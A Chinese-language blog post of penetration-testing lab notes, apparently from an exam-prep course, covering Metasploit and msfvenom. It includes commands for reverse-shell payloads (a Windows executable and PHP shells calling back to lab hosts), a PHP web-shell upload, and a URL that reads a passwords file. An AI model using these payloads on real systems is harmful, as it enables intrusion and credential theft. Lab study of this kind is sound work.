Metasploit Payloads

 Metasploit Payloads


接續上一節,在 Apache 2.4.49 選擇模組中選了 0 後可以查看相關 payload

輸入 show payloads,可以看到下圖的 17 是我們上一節使用的 payload




 


這次要利用的是 11,payload/linux/x64/meterpreter_reverse_https

set payload payload/linux/x64/meterpreter_reverse_https




use 11,show options 看一下要輸入那些值,看到有個 LURI 的值




run 之後輸入 shell 直接查找檔案 passwords 然後 cat 拿 flag






Metasploit 還提供將有效負載匯出為各種檔案類型和格式的功能,例如 Windows 和 Linux 二進位檔案、Webshel​​l 等。Metasploit 包含 msfvenom 作為產生這些有效負載的獨立工具。它提供標準化的命令列選項,並包括各種自訂有效負載的技術。


為了熟悉 msfvenom,我們首先建立一個惡意 Windows 二進位文件,啟動原始 TCP 反向 shell。讓我們先列出所有有效負載,並將有效負載作為-l的參數。此外,我們使用 --platform指定有效負載的平台,並使用--arch 指定架構。

指令 └─$ msfvenom -l payloads --platform windows --arch x64




讓我們使用 -p 標誌來設定有效負載,設定 LHOST 和 LPORT 來分配反向連接的主機和端口

參數 -f 來設定輸出格式(在本例中為 exe),以及 -o 來指定輸出檔案姓名

針對上述我們看到的一個有效 payload 作設置, windows/x64/shell_reverse_tcp

指令 : msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.186 LPORT=443 -f exe -o nonstaged.exe





建立一個 123.pHP payload

└─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.45.186 LPORT=4444 R > 123.pHP




上傳成功




或是上傳 simple-backdoor.pHP 然後執行

http://192.168.249.189/meteor/uploads/simple-backdoor.pHP?cmd=type%20C:\xampp\passwords.txt

拿 flag







製作 php Windows 用的 reserve shell 指令

└─$ msfvenom -p php/reverse_php LHOST=192.168.45.242 LPORT=4444 -f raw > shell2.pHP





reverse shell 進來後一樣可以 type 檔案




好用網站,msfvenom 製作 payload

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/





留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)